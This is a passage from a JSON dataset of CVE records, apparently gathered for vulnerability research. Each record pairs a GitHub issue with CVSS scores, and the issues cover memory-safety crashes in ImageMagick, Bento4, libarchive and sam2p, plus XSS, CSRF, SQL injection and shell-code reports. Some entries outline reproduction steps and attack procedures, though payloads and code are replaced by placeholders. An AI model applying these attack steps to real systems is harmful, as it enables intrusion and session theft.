APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG c1 in APITAG APITAG NUMBERTAG febd NUMBERTAG d7ea in APITAG APITAG NUMBERTAG febd NUMBERTAG b0cc in APITAG APITAG NUMBERTAG febd NUMBERTAG b NUMBERTAG c6 in APITAG ) APITAG NUMBERTAG febd NUMBERTAG be1b2 in APITAG const , long long) APITAG NUMBERTAG a9 in main samples/raw APITAG NUMBERTAG febd NUMBERTAG db NUMBERTAG in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG int, unsigned char , unsigned int) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9dd0: fa fa fd fd fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ~~~",
  8966. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8967. "severity": "HIGH",
  8968. "baseScore": 8.8,
  8969. "impactScore": 5.9,
  8970. "exploitabilityScore": 2.8
  8971. },
  8972. {
  8973. "CVE_ID": "CVE-2017-14400",
  8974. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/746",
  8975. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/746",
  8976. "Repo_new": "imagemagick/imagemagick",
  8977. "Issue_Created_At": "2017-09-11T09:38:24Z",
  8978. "description": "Null Pointer Dereference in APITAG APITAG poc1 version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : URLTAG trigger command : ./magick convert im_poc NUMBERTAG output.mpc ./magick convert output.mpc output.uil detail : APITAG APITAG PATHTAG ./magick im_poc NUMBERTAG out.mpc PATHTAG ./magick out.mpc out.aai ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG edb NUMBERTAG b bp NUMBERTAG ffd NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG T NUMBERTAG f NUMBERTAG edb NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG fe in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG a in APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG d8 in APITAG APITAG NUMBERTAG f NUMBERTAG e0d5f in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG e1f NUMBERTAG in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG e1 in APITAG APITAG NUMBERTAG c2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV APITAG APITAG NUMBERTAG ABORTING APITAG APITAG APITAG Security Lab",
  8979. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8980. "severity": "MEDIUM",
  8981. "baseScore": 6.5,
  8982. "impactScore": 3.6,
  8983. "exploitabilityScore": 2.8
  8984. },
  8985. {
  8986. "CVE_ID": "CVE-2017-14500",
  8987. "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/598",
  8988. "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/598",
  8989. "Repo_new": "akrennmair/newsbeuter",
  8990. "Issue_Created_At": "2017-09-16T18:03:42Z",
  8991. "description": "Remote code execution in Podebuter. Dear users, On the heels of the previous vulnerability we have a similar one in Podbeuter. An attacker can craft an RSS item where the name of media enclosure (the podcast file) contains shell code. When user plays the file in Podbeuter, the shell code will be executed. If you're using Podbeuter only to download podcasts, not play them, you're safe. Podbeuter versions NUMBERTAG through NUMBERTAG are affected. I'm still waiting for CVE. APITAG a request to MITRE on August NUMBERTAG th, pinged them on September NUMBERTAG th, but got nothing back.) Workaround ========== Don't play any podcasts in Podbeuter until you apply the fix. Resolution ========== A fix has already been pushed to our Git repository: URLTAG A patch for NUMBERTAG is also available: URLTAG I'll notify oss EMAILTAG APITAG so distributions ought to pick this up soon enough.",
  8992. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8993. "severity": "HIGH",
  8994. "baseScore": 8.8,
  8995. "impactScore": 5.9,
  8996. "exploitabilityScore": 2.8
  8997. },
  8998. {
  8999. "CVE_ID": "CVE-2017-14501",
  9000. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/949",
  9001. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/949",
  9002. "Repo_new": "libarchive/libarchive",
  9003. "Issue_Created_At": "2017-09-16T19:13:48Z",
  9004. "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian in CVETAG The reproducer (compressed with gzip), base NUMBERTAG APITAG is CODETAG ERRORTAG",
  9005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9006. "severity": "MEDIUM",
  9007. "baseScore": 6.5,
  9008. "impactScore": 3.6,
  9009. "exploitabilityScore": 2.8
  9010. },
  9011. {
  9012. "CVE_ID": "CVE-2017-14503",
  9013. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/948",
  9014. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/948",
  9015. "Repo_new": "libarchive/libarchive",
  9016. "Issue_Created_At": "2017-09-16T18:50:05Z",
  9017. "description": "out of bounds read in APITAG Hi The following was reported downstream in Debian at CVETAG The APITAG base NUMBERTAG encoded is: APITAG ` tested against APITAG ERRORTAG",
  9018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9019. "severity": "MEDIUM",
  9020. "baseScore": 6.5,
  9021. "impactScore": 3.6,
  9022. "exploitabilityScore": 2.8
  9023. },
  9024. {
  9025. "CVE_ID": "CVE-2017-14505",
  9026. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/716",
  9027. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/716",
  9028. "Repo_new": "imagemagick/imagemagick",
  9029. "Issue_Created_At": "2017-08-31T17:47:48Z",
  9030. "description": "Null Pointer Dereference triggered by malformed Image File. A Null Pointer Dereference issue is present in the APITAG function in the file PATHTAG This is due to the following vulnerable code: CODETAG The variable _dasharray_ gets the output of APITAG Looking at the code within this function, the following code explicitly returns NULL : APITAG Eventually _q_ gets the value stored in _dasharray_ (which is potentially NULL ) in APITAG Finally, _q_ gets explicitly dereferenced in APITAG Using APITAG would resolve the Null Pointer Dereference vulnerability.",
  9031. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9032. "severity": "MEDIUM",
  9033. "baseScore": 6.5,
  9034. "impactScore": 3.6,
  9035. "exploitabilityScore": 2.8
  9036. },
  9037. {
  9038. "CVE_ID": "CVE-2017-14530",
  9039. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/9",
  9040. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/9",
  9041. "Repo_new": "cybersecurityworks/disclosed",
  9042. "Issue_Created_At": "2015-10-27T09:34:16Z",
  9043. "description": "Cross Site Scripting (XSS) & Cross Site Request Forgery (CSRF) in Crony Cronjob Manager Version NUMBERTAG Details ================ Word Press Product Bugs Report Bug Name: XSS & CSRF in Crony Cronjob Manager Version NUMBERTAG Software: Crony Cronjob Manager Version NUMBERTAG APITAG Plugin) Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Compatible Up to Wordpress NUMBERTAG ersion APITAG NUMBERTAG or higher) Severity High Proof of concept: (POC) ================== Visit the following page on a site with this plugin installed. URLTAG and modify the value of APITAG name APITAG variable with APITAG payload and send the request to the server after generating CSRF request to the victim Now, the added XSS payload will be executed on the victim machine and victim machine can be compromised. APITAG APITAG XSS payload has been tried with the application once after implementing Unfiltered Html Settings as defined to FILETAG file. APITAG APITAG APITAG define( 'DISALLOW_UNFILTERED_HTML', true ); APITAG APITAG APITAG APITAG NUMBERTAG APITAG The POST Request of the variable APITAG name APITAG in the URL URLTAG is vulnerable to XSS and the plugin is also exploitable using CSRF vulnerability. Whereas, explained in details with screenshots below. FILETAG APITAG NUMBERTAG APITAG Cronjobs list before CSRF code & XSS Payload gets executed. FILETAG APITAG NUMBERTAG APITAG name variable input field which is vulnerable to XSS FILETAG APITAG NUMBERTAG APITAG Capturing the HTTP request in intercept proxy FILETAG APITAG NUMBERTAG APITAG Created a crafted HTML page with XSS input and CSRF Request APITAG APITAG After creating the CSRFT HTML page the user logout and then again login in and then the HTML page is executed. In this case we have executed it from local machine. FILETAG APITAG NUMBERTAG APITAG XSS Payload gets executed in the browser once the link sent by the attacker has been clicked. FILETAG APITAG NUMBERTAG APITAG XSS payload gets executed and a new cronjob is created. APITAG Steps APITAG NUMBERTAG Logon into any wordpress application (attacker NUMBERTAG Click to APITAG new cronjob\u201d in Crony Cronjob Manager Version NUMBERTAG Plugin and capture the request in intercepting proxy NUMBERTAG Now, Generate a CSRF Request with attacker logged in account NUMBERTAG Modify the request with the code you required to get executed in victim\u2019s browser NUMBERTAG Enter the value for the APITAG name APITAG variable with \u201cXSS&CSRF\u201d and add any scripts, malicious code or payload NUMBERTAG Here, its APITAG which an attacker wants to get executed in victim\u2019s browser and sends the link to victim NUMBERTAG Now, once the victim opens the link in the user logged in browser. Then, immediately the added XSS payload will be executed whenever we review it. APITAG APITAG NUMBERTAG Discovered in Crony Cronjob Manager Version NUMBERTAG Reported to EMAILTAG rg & EMAILTAG NUMBERTAG EMAILTAG replied, \"I'll check it out, thanks for the heads up NUMBERTAG Another response from developer, \"I'll be back into things tomorrow morning, will let you know once it's up NUMBERTAG Issues fixed in version NUMBERTAG developer responded. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  9044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  9045. "severity": "HIGH",
  9046. "baseScore": 8.0,
  9047. "impactScore": 5.9,
  9048. "exploitabilityScore": 2.1
  9049. },
  9050. {
  9051. "CVE_ID": "CVE-2017-14531",
  9052. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/718",
  9053. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/718",
  9054. "Repo_new": "imagemagick/imagemagick",
  9055. "Issue_Created_At": "2017-09-02T17:23:58Z",
  9056. "description": "memory exhausted in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG is from file as follow: APITAG APITAG is NUMBERTAG bit, it can be large as NUMBERTAG ffffffff. and APITAG can max use NUMBERTAG G RAM, even if the image file is very small. Credit: APITAG of Venustech",
  9057. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9058. "severity": "MEDIUM",
  9059. "baseScore": 6.5,
  9060. "impactScore": 3.6,
  9061. "exploitabilityScore": 2.8
  9062. },
  9063. {
  9064. "CVE_ID": "CVE-2017-14532",
  9065. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/719",
  9066. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/719",
  9067. "Repo_new": "imagemagick/imagemagick",
  9068. "Issue_Created_At": "2017-09-03T15:03:33Z",
  9069. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so APITAG will access Null pointer to cause memory error. Credit: APITAG of Venustech",
  9070. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9071. "severity": "CRITICAL",
  9072. "baseScore": 9.8,
  9073. "impactScore": 5.9,
  9074. "exploitabilityScore": 3.9
  9075. },
  9076. {
  9077. "CVE_ID": "CVE-2017-14533",
  9078. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/648",
  9079. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/648",
  9080. "Repo_new": "imagemagick/imagemagick",
  9081. "Issue_Created_At": "2017-08-05T14:49:37Z",
  9082. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG APITAG of Venustech",
  9083. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9084. "severity": "MEDIUM",
  9085. "baseScore": 6.5,
  9086. "impactScore": 3.6,
  9087. "exploitabilityScore": 2.8
  9088. },
  9089. {
  9090. "CVE_ID": "CVE-2017-14600",
  9091. "Issue_Url_old": "https://github.com/delta/pragyan/issues/228",
  9092. "Issue_Url_new": "https://github.com/delta/pragyan/issues/228",
  9093. "Repo_new": "delta/pragyan",
  9094. "Issue_Created_At": "2017-09-14T08:45:02Z",
  9095. "description": "Found NUMBERTAG SQL injection vulnerabilities. both two vulnerabilities need to login as admin first in APITAG line NUMBERTAG ERRORTAG function APITAG ERRORTAG no filter at all, so we can cause a boolean base sql injection. APITAG like: APITAG the second one in line NUMBERTAG ERRORTAG function APITAG ERRORTAG APITAG has nothing to do with sql injection, so we can use error base sql injection APITAG APITAG",
  9096. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  9097. "severity": "MEDIUM",
  9098. "baseScore": 4.9,
  9099. "impactScore": 3.6,
  9100. "exploitabilityScore": 1.2
  9101. },
  9102. {
  9103. "CVE_ID": "CVE-2017-14604",
  9104. "Issue_Url_old": "https://github.com/freedomofpress/securedrop/issues/2238",
  9105. "Issue_Url_new": "https://github.com/freedomofpress/securedrop/issues/2238",
  9106. "Repo_new": "freedomofpress/securedrop",
  9107. "Issue_Created_At": "2017-09-01T00:36:32Z",
  9108. "description": "Investigate potential attempt to compromise SVS. Kevin Poulsen just tweeted URLTAG a snippet of code that he says he received on his APITAG The code snippet is incomplete, but it appears to be an attempt to exfiltrate sensitive data from the airgapped Secure Viewing Station (SVS). Normally we would prefer to discuss potential security issues privately, in order to develop and deploy a fix without encouraging potential exploitation in case this really is a security vulnerability. In this case, the cat's out of the bag thanks the issue being reported publicly on Twitter, so we feel it's best to discuss it on an open forum in the interest of transparency.",
  9109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  9110. "severity": "MEDIUM",
  9111. "baseScore": 6.5,
  9112. "impactScore": 3.6,
  9113. "exploitabilityScore": 2.8
  9114. },
  9115. {
  9116. "CVE_ID": "CVE-2017-14607",
  9117. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/765",
  9118. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/765",
  9119. "Repo_new": "imagemagick/imagemagick",
  9120. "Issue_Created_At": "2017-09-19T09:55:55Z",
  9121. "description": "Heap buffer over read in APITAG version: CODETAG gcc APITAG NUMBERTAG APITAG NUMBERTAG crash case: FILETAG trigger command : APITAG detail: ERRORTAG",
  9122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  9123. "severity": "HIGH",
  9124. "baseScore": 8.1,
  9125. "impactScore": 5.2,
  9126. "exploitabilityScore": 2.8
  9127. },
  9128. {
  9129. "CVE_ID": "CVE-2017-14608",
  9130. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/101",
  9131. "Issue_Url_new": "https://github.com/libraw/libraw/issues/101",
  9132. "Repo_new": "libraw/libraw",
  9133. "Issue_Created_At": "2017-09-13T03:32:23Z",
  9134. "description": "Stack out of bounds read in APITAG Command to reproduce: APITAG FILETAG ERRORTAG gdb debug output: ERRORTAG we could see that the index of curve is a large negative number APITAG , leads out of bounds read.",
  9135. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  9136. "severity": "CRITICAL",
  9137. "baseScore": 9.1,
  9138. "impactScore": 5.2,
  9139. "exploitabilityScore": 3.9
  9140. },
  9141. {
  9142. "CVE_ID": "CVE-2017-14624",
  9143. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/722",
  9144. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/722",
  9145. "Repo_new": "imagemagick/imagemagick",
  9146. "Issue_Created_At": "2017-09-03T15:05:21Z",
  9147. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9148. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9149. "severity": "CRITICAL",
  9150. "baseScore": 9.8,
  9151. "impactScore": 5.9,
  9152. "exploitabilityScore": 3.9
  9153. },
  9154. {
  9155. "CVE_ID": "CVE-2017-14625",
  9156. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/721",
  9157. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/721",
  9158. "Repo_new": "imagemagick/imagemagick",
  9159. "Issue_Created_At": "2017-09-03T15:05:00Z",
  9160. "description": "Null Pointer Dereference in sixel_decode and sixel_output_create. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG CODETAG APITAG may return NULL, so ( palette)[n NUMBERTAG n] and output >xxx will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9162. "severity": "CRITICAL",
  9163. "baseScore": 9.8,
  9164. "impactScore": 5.9,
  9165. "exploitabilityScore": 3.9
  9166. },
  9167. {
  9168. "CVE_ID": "CVE-2017-14626",
  9169. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/720",
  9170. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/720",
  9171. "Repo_new": "imagemagick/imagemagick",
  9172. "Issue_Created_At": "2017-09-03T15:03:51Z",
  9173. "description": "Null Pointer Dereference in sixel_decode. APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: ERRORTAG APITAG may return NULL, so ( palette)[n NUMBERTAG will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9174. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9175. "severity": "CRITICAL",
  9176. "baseScore": 9.8,
  9177. "impactScore": 5.9,
  9178. "exploitabilityScore": 3.9
  9179. },
  9180. {
  9181. "CVE_ID": "CVE-2017-14628",
  9182. "Issue_Url_old": "https://github.com/pts/sam2p/issues/14",
  9183. "Issue_Url_new": "https://github.com/pts/sam2p/issues/14",
  9184. "Repo_new": "pts/sam2p",
  9185. "Issue_Created_At": "2017-09-18T13:28:39Z",
  9186. "description": "6 bugs found in sam2p. bug NUMBERTAG integer overflow(lead to heap buffer overflow) poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG after the subduction, w will be a negative number. URLTAG so pad will become larger when the program use it to sub w. URLTAG and when using pad, it will access the invalid memory before the allocated chunk. patch: change w from signed to unsigned. bug NUMBERTAG heap buffer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG The crash happened in the APITAG function of the file APITAG The size of the Pic NUMBERTAG is w h planes. But the loop time is nbytes=bperlin h planes, in the loop, pix will add one each time. It will cause a heap overflow when bperlin>w. In this poc, bperlin NUMBERTAG w NUMBERTAG patch: Compare the size of w and bperlin bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: It crashed in function in_xpm_reader. The type of p is char When p NUMBERTAG a0\uff0cp NUMBERTAG p NUMBERTAG will be recognized as a negative integer, it will make bin NUMBERTAG ffffffffffffa NUMBERTAG I, which caused a crash. patch: change p from signed to unsigned char . bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In this poc, when APITAG returned NUMBERTAG to ncols, ncols made it to NUMBERTAG ffffffff, and caused a integer overflow. So the loop will excute NUMBERTAG ffffffff times, which caused the crash. patch: Define Ncols as an int, or you can judge if ncols is NULL. bug NUMBERTAG out of bounds access poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG NUMBERTAG but the size of APITAG is NUMBERTAG If APITAG NUMBERTAG it will crash. patch: modified APITAG or expand the APITAG bug NUMBERTAG integer overflow poc: URLTAG asan: URLTAG method: ./sam2p crash EPS: /dev/null reason: URLTAG In APITAG function APITAG W h planes will cause integer overflow. patch: check W h planes' value before malloc.",
  9187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9188. "severity": "CRITICAL",
  9189. "baseScore": 9.8,
  9190. "impactScore": 5.9,
  9191. "exploitabilityScore": 3.9
  9192. },
  9193. {
  9194. "CVE_ID": "CVE-2017-14634",
  9195. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/318",
  9196. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/318",
  9197. "Repo_new": "libsndfile/libsndfile",
  9198. "Issue_Created_At": "2017-09-14T09:30:55Z",
  9199. "description": "a div zero vul in function APITAG in libsndfile NUMBERTAG ERRORTAG",
  9200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9201. "severity": "MEDIUM",
  9202. "baseScore": 6.5,
  9203. "impactScore": 3.6,
  9204. "exploitabilityScore": 2.8
  9205. },
  9206. {
  9207. "CVE_ID": "CVE-2017-14638",
  9208. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/182",
  9209. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/182",
  9210. "Repo_new": "axiomatic-systems/bento4",
  9211. "Issue_Created_At": "2017-09-08T13:23:17Z",
  9212. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9213. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9214. "severity": "MEDIUM",
  9215. "baseScore": 6.5,
  9216. "impactScore": 3.6,
  9217. "exploitabilityScore": 2.8
  9218. },
  9219. {
  9220. "CVE_ID": "CVE-2017-14639",
  9221. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/190",
  9222. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/190",
  9223. "Repo_new": "axiomatic-systems/bento4",
  9224. "Issue_Created_At": "2017-09-08T13:41:59Z",
  9225. "description": "stack based buffer underflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9226. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9227. "severity": "HIGH",
  9228. "baseScore": 8.8,
  9229. "impactScore": 5.9,
  9230. "exploitabilityScore": 2.8
  9231. },
  9232. {
  9233. "CVE_ID": "CVE-2017-14640",
  9234. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/183",
  9235. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/183",
  9236. "Repo_new": "axiomatic-systems/bento4",
  9237. "Issue_Created_At": "2017-09-08T13:25:38Z",
  9238. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9240. "severity": "MEDIUM",
  9241. "baseScore": 6.5,
  9242. "impactScore": 3.6,
  9243. "exploitabilityScore": 2.8
  9244. },
  9245. {
  9246. "CVE_ID": "CVE-2017-14641",
  9247. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/184",
  9248. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/184",
  9249. "Repo_new": "axiomatic-systems/bento4",
  9250. "Issue_Created_At": "2017-09-08T13:28:21Z",
  9251. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9253. "severity": "MEDIUM",
  9254. "baseScore": 6.5,
  9255. "impactScore": 3.6,
  9256. "exploitabilityScore": 2.8
  9257. },
  9258. {
  9259. "CVE_ID": "CVE-2017-14642",
  9260. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/185",
  9261. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/185",
  9262. "Repo_new": "axiomatic-systems/bento4",
  9263. "Issue_Created_At": "2017-09-08T13:31:49Z",
  9264. "description": "NULL pointer dereference in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9266. "severity": "MEDIUM",
  9267. "baseScore": 6.5,
  9268. "impactScore": 3.6,
  9269. "exploitabilityScore": 2.8
  9270. },
  9271. {
  9272. "CVE_ID": "CVE-2017-14643",
  9273. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/187",
  9274. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/187",
  9275. "Repo_new": "axiomatic-systems/bento4",
  9276. "Issue_Created_At": "2017-09-08T13:35:49Z",
  9277. "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9279. "severity": "MEDIUM",
  9280. "baseScore": 6.5,
  9281. "impactScore": 3.6,
  9282. "exploitabilityScore": 2.8
  9283. },
  9284. {
  9285. "CVE_ID": "CVE-2017-14646",
  9286. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/188",
  9287. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/188",
  9288. "Repo_new": "axiomatic-systems/bento4",
  9289. "Issue_Created_At": "2017-09-08T13:37:40Z",
  9290. "description": "heap based buffer overflow in APITAG APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG",
  9291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9292. "severity": "HIGH",
  9293. "baseScore": 7.5,
  9294. "impactScore": 3.6,
  9295. "exploitabilityScore": 3.9
  9296. },
  9297. {
  9298. "CVE_ID": "CVE-2017-14651",
  9299. "Issue_Url_old": "https://github.com/cybersecurityworks/Disclosed/issues/15",
  9300. "Issue_Url_new": "https://github.com/cybersecurityworks/disclosed/issues/15",
  9301. "Repo_new": "cybersecurityworks/disclosed",
  9302. "Issue_Created_At": "2017-09-18T13:24:31Z",
  9303. "description": "Multiple Cross Site Scripting (XSS) in WSO2 Data Analytics Server Version NUMBERTAG Details: WSO2 Product Bug Report Bug Name: Multiple Cross Site Scripting (XSS) Product Name: WSO2 Server: WSO2 Data Analytics Server Product. Version NUMBERTAG Last Updated NUMBERTAG Homepage: URLTAG Severity: Medium Status: Fixed Exploitation Requires Authentication?: yes Vulnerable URL: FILETAG Vulnerable Variable: APITAG & APITAG APITAG Description: Cross Site Scripting (XSS) vulnerability in WSO2 Data Analytics Server Product. By exploiting a Cross site scripting vulnerability the attacker can hijack a logged in user\u2019s session by stealing cookies which means that the malicious hacker can change the logged in user\u2019s password and invalidate the session of the victim while the hacker maintains access. Proof of concept: (POC) APITAG NUMBERTAG APITAG Accessing the POST Request of the URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG and APITAG APITAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS 